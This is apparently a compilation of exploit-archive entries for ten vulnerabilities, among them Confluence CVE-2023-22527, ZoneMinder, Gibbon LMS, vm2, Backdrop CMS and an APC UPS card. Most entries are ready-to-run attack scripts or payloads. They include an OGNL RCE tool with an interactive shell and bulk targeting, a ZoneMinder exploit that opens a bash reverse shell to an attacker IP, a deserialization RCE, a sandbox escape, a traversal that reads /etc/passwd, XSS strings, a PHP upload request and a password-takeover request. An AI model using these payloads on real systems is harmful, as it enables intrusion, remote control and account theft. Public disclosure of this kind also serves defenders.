<pre><code># Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability<br /># Date: 25/1/2024<br /># Exploit Author: MaanVader<br /># Vendor Homepage: https://www.atlassian.com/software/confluence<br /># Software Link: https://www.atlassian.com/software/confluence<br /># Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3<br /># Tested on: 8.5.3<br /># CVE : CVE-2023-22527<br /><br /><br /><br />import requests<br />import argparse<br />import urllib3<br />from prompt_toolkit import PromptSession<br />from prompt_toolkit.formatted_text import HTML<br />from rich.console import Console<br /><br /># Disable SSL warnings<br />urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)<br /><br /># Argument parsing<br />parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")<br />parser.add_argument("-u", "--url", help="Single Confluence Server URL")<br />parser.add_argument("-f", "--file", help="File containing list of IP addresses")<br />parser.add_argument("-c", "--command", help="Command to Execute")<br />parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")<br />args = parser.parse_args()<br /><br /># Rich console for formatted output<br />console = Console()<br /><br /># Function to send payload<br />def send_payload(url, command):<br /> headers = {<br /> 'Connection': 'close',<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> }<br /> payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'<br /> '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')<br /> headers['Content-Length'] = str(len(payload))<br /> <br /> full_url = f"{url}/template/aui/text-inline.vm"<br /> response = requests.post(full_url, verify=False, headers=headers, 
data=payload, timeout=10, allow_redirects=False)<br /> return response.text.split('<!DOCTYPE html>')[0].strip()<br /><br /># Interactive shell function<br />def interactive_shell(url):<br /> session = PromptSession()<br /> console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")<br /> while True:<br /> try:<br /> cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))<br /> if cmd.lower() in ["exit", "quit"]:<br /> break<br /> response = send_payload(url, cmd)<br /> console.print(response)<br /> except KeyboardInterrupt:<br /> break<br /> except Exception as e:<br /> console.print(f"[bold red]Error: {e}[/bold red]")<br /> break<br /><br /># Process file function<br />def process_file(file_path):<br /> with open(file_path, 'r') as file:<br /> for line in file:<br /> ip = line.strip()<br /> url = f"http://{ip}:8090"<br /> console.print(f"Processing {url}")<br /> print(send_payload(url, args.command))<br /><br /># Main execution logic<br />if args.shell and args.url:<br /> interactive_shell(args.url)<br />elif args.url and args.command:<br /> print(send_payload(args.url, args.command))<br />elif args.file and args.command:<br /> process_file(args.file)<br />else:<br /> print("Error: Please provide a valid URL and a command or use the interactive shell option.")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field<br /># Date: 2023-08-21<br /># Exploit Author: Sinem Şahin<br /># Vendor Homepage: https://backdropcms.org/<br /># Version: 1.23.0<br /># Tested on: Windows & XAMPP<br /><br />==> Tutorial <==<br /><br />1- Go to the following URL: http://(HOST)/backdrop/node/add/post<br />2- Write your XSS payload in the body of the post, with the text format set to "Raw HTML".<br />3- Press the "Save" button.<br /><br />XSS Payload ==> "<script>alert("post_body")</script><br /><br /><br /></code></pre>
<pre><code>import re<br />import requests<br />from bs4 import BeautifulSoup<br />import argparse<br />import base64<br /><br /># Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots<br /># Date: 12 December 2023<br /># Discovered by : @Unblvr1<br /># Exploit Author: Ravindu Wickramasinghe (@rvizx9)<br /># Vendor Homepage: https://zoneminder.com/<br /># Software Link: https://github.com/ZoneMinder/zoneminder<br /># Version: prior to 1.36.33 and 1.37.33<br /># Tested on: Arch Linux, Kali Linux<br /># CVE : CVE-2023-26035<br /># Github Link : https://github.com/rvizx/CVE-2023-26035<br /><br /><br />class ZoneMinderExploit:<br /> def __init__(self, target_uri):<br /> self.target_uri = target_uri<br /> self.csrf_magic = None<br /><br /> def fetch_csrf_token(self):<br /> print("[>] fetching csrt token")<br /> response = requests.get(self.target_uri)<br /> self.csrf_magic = self.get_csrf_magic(response)<br /> if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):<br /> print(f"[>] recieved the token: {self.csrf_magic}")<br /> return True<br /> print("[!] unable to fetch or parse token.")<br /> return False<br /><br /> def get_csrf_magic(self, response):<br /> return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)<br /><br /> def execute_command(self, cmd):<br /> print("[>] sending payload..")<br /> data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}<br /> response = requests.post(f"{self.target_uri}/index.php", data=data)<br /> print("[>] payload sent" if response.status_code == 200 else "[!] 
failed to send payload")<br /><br /> def exploit(self, payload):<br /> if self.fetch_csrf_token():<br /> print(f"[>] executing...")<br /> self.execute_command(payload)<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser()<br /> parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')<br /> parser.add_argument('-ip', '--local-ip', required=True, help='local ip')<br /> parser.add_argument('-p', '--port', required=True, help='port')<br /> args = parser.parse_args()<br /><br /> # generating the payload<br /> ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1" <br /> ps2 = base64.b64encode(ps1.encode()).decode()<br /> payload = f"echo {ps2} | base64 -d | /bin/bash"<br /><br /> ZoneMinderExploit(args.target_url).exploit(payload)<br /> <br /><br /></code></pre>
<pre><code>Exploit Title: WordPress File Upload < 4.23.3 Stored XSS (CVE-2023-4811)<br />Date: 18 December 2023<br />Exploit Author: Faiyaz Ahmad<br />Vendor Homepage: https://wordpress.com/<br />Version: 4.23.3<br />CVE : CVE-2023-4811<br /><br />Proof Of Concept:<br /><br />1. Log in to the WordPress account.<br /><br />2. Add the following shortcode to a post using the "File Upload" plugin:<br /><br />[wordpress_file_upload redirect="true" redirectlink="*javascript:alert(1)*"]<br /><br />3. Upload any file through the resulting post.<br />4. After the upload completes, the XSS alert appears in the browser.<br /><br /></code></pre>
<pre><code># Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on <br />the v26.0.00 version<br /># Date: 22.01.2024<br /># Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat <br />Guliev,Islam Rzayev )<br /># Vendor Homepage: https://gibbonedu.org/<br /># Software Link: https://github.com/GibbonEdu/core<br /># Version: v26.0.00<br /># Tested on: Ubuntu 22.0<br /># CVE : CVE-2024-24725<br /><br />import requests<br />import re<br />import sys<br />import base64<br />import urllib.parse<br /><br /><br />def login(target_host, target_port,email,password):<br /> url = f'http://{target_host}:{target_port}/login.php?timeout=true'<br /> headers = {"Content-Type": "multipart/form-data; <br />boundary=---------------------------174475955731268836341556039466"}<br /> data = <br />f"-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"address\"\r\n\r\n\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"method\"\r\n\r\ndefault\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"username\"\r\n\r\n{email}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"password\"\r\n\r\n{password}\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"gibbonSchoolYearID\"\r\n\r\n025\r\n-----------------------------174475955731268836341556039466\r\nContent-Disposition: <br />form-data; <br />name=\"gibboni18nID\"\r\n\r\n0002\r\n-----------------------------174475955731268836341556039466--\r\n"<br /> r = requests.post(url, headers=headers, data=data, <br />allow_redirects=False)<br /> Session_Cookie = re.split(r"\s+", r.headers['Set-Cookie'])<br /> if Session_Cookie[4] is not None and '/index.php' in <br />str(r.headers['Location']):<br /> print("[X] 
Login successful!")<br /><br /> return Session_Cookie[4]<br /><br /><br /><br />def generate_payload(command):<br /><br /> # Given base64-encoded string<br /> ### Actual Payload:<br /> ### <br />a:2:{i:7%3BO:32:"Monolog\Handler\SyslogUdpHandler":1:{s:9:"%00*%00socket"%3BO:29:"Monolog\Handler\BufferHandler":7:{s:10:"%00*%00handler"%3Br:3%3Bs:13:"%00*%00bufferSize"%3Bi:-1%3Bs:9:"%00*%00buffer"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:COMMAND_SIZE:"COMMAND"%3Bs:5:"level"%3BN%3B}}s:8:"%00*%00level"%3BN%3Bs:14:"%00*%00initialized"%3Bb:1%3Bs:14:"%00*%00bufferLimit"%3Bi:-1%3Bs:13:"%00*%00processors"%3Ba:2:{i:0%3Bs:7:"current"%3Bi:1%3Bs:6:"system"%3B}}}i:7%3Bi:7%3B}<br /> base64_encoded_string = <br />'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'<br /><br /> command_size = len(command)<br /><br /> # Decode base64<br /> decoded_bytes = base64.b64decode(base64_encoded_string)<br /> decoded_string = decoded_bytes.decode('utf-8')<br /><br /> # URL decode<br /> payload = urllib.parse.unquote(decoded_string)<br /> # Replace placeholders in the decoded string<br /> payload = payload.replace('COMMAND_SIZE', str(command_size))<br /> payload = payload.replace('COMMAND', command)<br /> print("[X] Payload Generated!")<br /> return payload<br /><br /><br /><br />def rce(cookie, target_host, target_port, command):<br /> url = <br />f'http://{target_host}:{target_port}/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'<br /> headers = {"Content-Type": "multipart/form-data; <br />boundary=---------------------------104550429928543086952438317710","Cookie": <br />cookie}<br /> payload = generate_payload(command)<br /> data = <br />f'-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; name="address"\r\n\r\n/modules/System <br />Admin/import_run.php\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br 
/>name="mode"\r\n\r\nsync\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="syncField"\r\n\r\nN\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="syncColumn"\r\n\r\n\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="columnOrder"\r\n\r\n{payload}\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="columnText"\r\n\r\nN;\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="fieldDelimiter"\r\n\r\n%2C\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="stringEnclosure"\r\n\r\n%22\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="filename"\r\n\r\nDataStructure-externalAssessment.xlsx\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; name="csvData"\r\n\r\n"External Assessment","Assessment <br />Date","Student","Field Name Category","Field <br />Name","Result"\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="ignoreErrors"\r\n\r\n1\r\n-----------------------------104550429928543086952438317710\r\nContent-Disposition: <br />form-data; <br />name="Failed"\r\n\r\nSubmit\r\n-----------------------------104550429928543086952438317710--'<br /><br /> r = requests.post(url, headers=headers, data=data, <br />allow_redirects=False)<br /> print("[X] Request sent!")<br /><br /> start_index = r.text.find("<h2>Step 4 - Live Run</h2>")<br /> end_index = r.text.find("<div class", start_index)<br /> result = r.text[start_index+26:end_index].strip()<br /> if result != '':<br /> print("[X] Execution result: \n"+result)<br /> 
else:<br /> print("[X] Command failed or did not output anything.")<br /><br /> with open("pocresponse.html", "wb") as f:<br /> f.write(r.content)<br /><br />if __name__ == '__main__':<br /> if len(sys.argv) != 6:<br /> print("[X] Usage: script.py <target_host> <target_port> <email> <br /><password> <command>")<br /> sys.exit(1)<br /> cookie = login(sys.argv[1], sys.argv[2],sys.argv[3],sys.argv[4])<br /> rce(cookie, sys.argv[1], sys.argv[2], sys.argv[5])<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: UPS Network Management Card 4 - Path Traversal<br /># Google Dork: inurl:nmc inurl:logon.htm<br /># Date: 2023-12-19<br /># Exploit Author: Víctor García<br /># Vendor Homepage: https://www.apc.com/<br /># Version: 4<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /># PoC:<br />curl -k<br />https://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd<br /><br />root:x:0:0:root:/home/root:/bin/sh<br />daemon:x:1:1:daemon:/usr/sbin:/bin/sh<br />bin:x:2:2:bin:/bin:/bin/sh<br />sys:x:3:3:sys:/dev:/bin/sh<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/bin/sh<br />man:x:6:12:man:/var/cache/man:/bin/sh<br />lp:x:7:7:lp:/var/spool/lpd:/bin/sh<br />mail:x:8:8:mail:/var/mail:/bin/sh<br />news:x:9:9:news:/var/spool/news:/bin/sh<br />uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<br />proxy:x:13:13:proxy:/bin:/bin/sh<br />www-data:x:33:33:www-data:/var/www:/bin/sh<br />backup:x:34:34:backup:/var/backups:/bin/sh<br />list:x:38:38:Mailing List Manager:/var/list:/bin/sh<br />irc:x:39:39:ircd:/var/run/ircd:/bin/sh<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh<br />dhcp:x:997:997::/var/run/dhcp:/bin/false<br />messagebus:x:998:998::/var/lib/dbus:/bin/false<br />mosquitto:x:999:999::/home/mosquitto:/bin/false<br />nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<br /><br /></code></pre>
<pre><code>## Title: GASMARK PRO-1.0 File Upload RCE<br /><br />## Author: nu11secur1ty<br />## Date: 03/17/2024<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html<br />## Reference: https://portswigger.net/web-security/file-upload<br />## Reference: https://www.cloudflare.com/learning/security/what-is-remote-code-execution/<br /><br />## Description:<br />Vulnerable input:<br />`<input type="file" class="form-control" id="productImage"<br />name="productImage" style="width:auto;">`<br />This application suffers from shell upload and remote code execution<br />vulnerability, the attacker easily<br />can destroy this system, when he has credentials.<br /><br />STATUS: HIGH- Vulnerability CRITICAL<br /><br />[+]Exploit:<br />```PHP<br />POST /gasmark/gasmark/php_action/createclient.php HTTP/1.1<br />Host: pwnedhost.com<br />Cookie: PHPSESSID=1afinf22p9snl2nai24g29duuc<br />Content-Length: 1063<br />Cache-Control: max-age=0<br />Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />Origin: https://pwnedhost.com<br />Content-Type: multipart/form-data;<br />boundary=----WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112<br />Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://pwnedhost.com/gasmark/gasmark/add_client.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Priority: u=0, i<br />Connection: close<br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br 
/>Content-Disposition: form-data; name="currnt_date"<br /><br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="name"<br /><br />pwned<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="gender"<br /><br />Female<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="mob_no"<br /><br />1234<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="reffering"<br /><br />1234<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="address"<br /><br />1234<br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="productImage"; filename="1nsi1deyou.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br />// by nu11secur1ty - 2023<br />$fh = fopen('test.html', 'a');<br />fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');<br />fclose($fh);<br /><br />//nlink('test.html');<br />?><br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB<br />Content-Disposition: form-data; name="create"<br /><br /><br />------WebKitFormBoundaryb4PfTJ8hUNsEjxtB--<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/gasmark-pro-10-file-upload-rce.html)<br /><br />## Time spent:<br />00:25:00<br /><br /></code></pre>
<pre><code># Exploit Title: Nokia BMC Log Scanner Remote Code Execution<br /># Google Dork: N/A<br /># Date: November 29, 2023<br /># Exploit Author: Carlos Andres Gonzalez, Matthew Gregory<br /># Vendor Homepage: https://www.nokia.com/<br /># Software Link: N/A<br /># Version: 13<br /># Tested on: Linux<br /># CVE : CVE-2022-45899<br /><br />Description<br />The BMC Log Scanner web application, available on several hosts, is vulnerable to command injection<br />attacks, allowing unauthenticated remote code execution. This vulnerability is especially significant<br />because the service runs as root.<br /><br />Steps to Reproduce:<br />In the Search Pattern field, type:<br /><br />;";command<br /><br />replacing the word "command" above with any Linux command.<br />Root access can be confirmed with the id command or any other command that requires<br />root privileges, such as displaying the contents of the /etc/shadow file.<br /><br />This issue was fixed in version 13.1.<br /><br /></code></pre>
<pre><code>/*<br /># Exploit Title: vm2 Sandbox Escape vulnerability<br /># Date: 23/12/2023<br /># Exploit Author: Calil Khalil & Adriel Mc Roberts<br /># Vendor Homepage: https://github.com/patriksimek/vm2<br /># Software Link: https://github.com/patriksimek/vm2<br /># Version: vm2 <= 3.9.19<br /># Tested on: Ubuntu 22.04<br /># CVE : CVE-2023-37466<br />*/<br /><br />const { VM } = require("vm2");<br />const vm = new VM();<br /><br />const command = 'pwd'; // Change to the desired command<br /><br />const code = `<br />async function fn() {<br /> (function stack() {<br /> new Error().stack;<br /> stack();<br /> })();<br />}<br /><br />try {<br /> const handler = {<br /> getPrototypeOf(target) {<br /> (function stack() {<br /> new Error().stack;<br /> stack();<br /> })();<br /> }<br /> };<br /><br /> const proxiedErr = new Proxy({}, handler);<br /><br /> throw proxiedErr;<br />} catch ({ constructor: c }) {<br /> const childProcess = c.constructor('return process')().mainModule.require('child_process');<br /> childProcess.execSync('${command}');<br />}<br />`;<br /><br />console.log(vm.run(code));<br /> <br /></code></pre>
<pre><code># Vulnerability type: Incorrect Access Control<br /># Vendor: https://www.unit4.com/<br /># Product: Financials by Coda<br /># Product site: https://www.unit4.com/fr/products/financial-management-software<br /># Affected version: < 2023Q4<br /># Fixed version: 2023Q4<br /># Credit: Léo DRAGHI<br /># CVE: CVE-2024-28735<br /><br /># PROOF OF CONCEPT<br />The "Change Password" feature can be abused to change the password of any user of the application.<br />The only requirements for an attacker are the credentials of a valid account (regardless of its profile) and the username of the target.<br />In the request below, the "password" field carries the attacker's own password while the "user" field names the victim, so the server does not check that the account being modified belongs to the caller.<br /><br />POST /coda/rest/session/password HTTP/2<br />Host: <target><br /><snip><br /><br />{<br /> "user" : "<targeted_user>",<br /> "password" : "<attacker_user_password>",<br /> "company" : "<company>",<br /> "newPassword" : "<new_password_for_targeted_user>",<br /> "tzOffset" :240<br />}<br /><br /># TIMELINE<br />– 30/10/2023: Vulnerability found<br />– 02/11/2023: Vendor informed<br />– 05/12/2023: Vendor fixed the issue<br />– 14/03/2024: Public disclosure<br /></code></pre>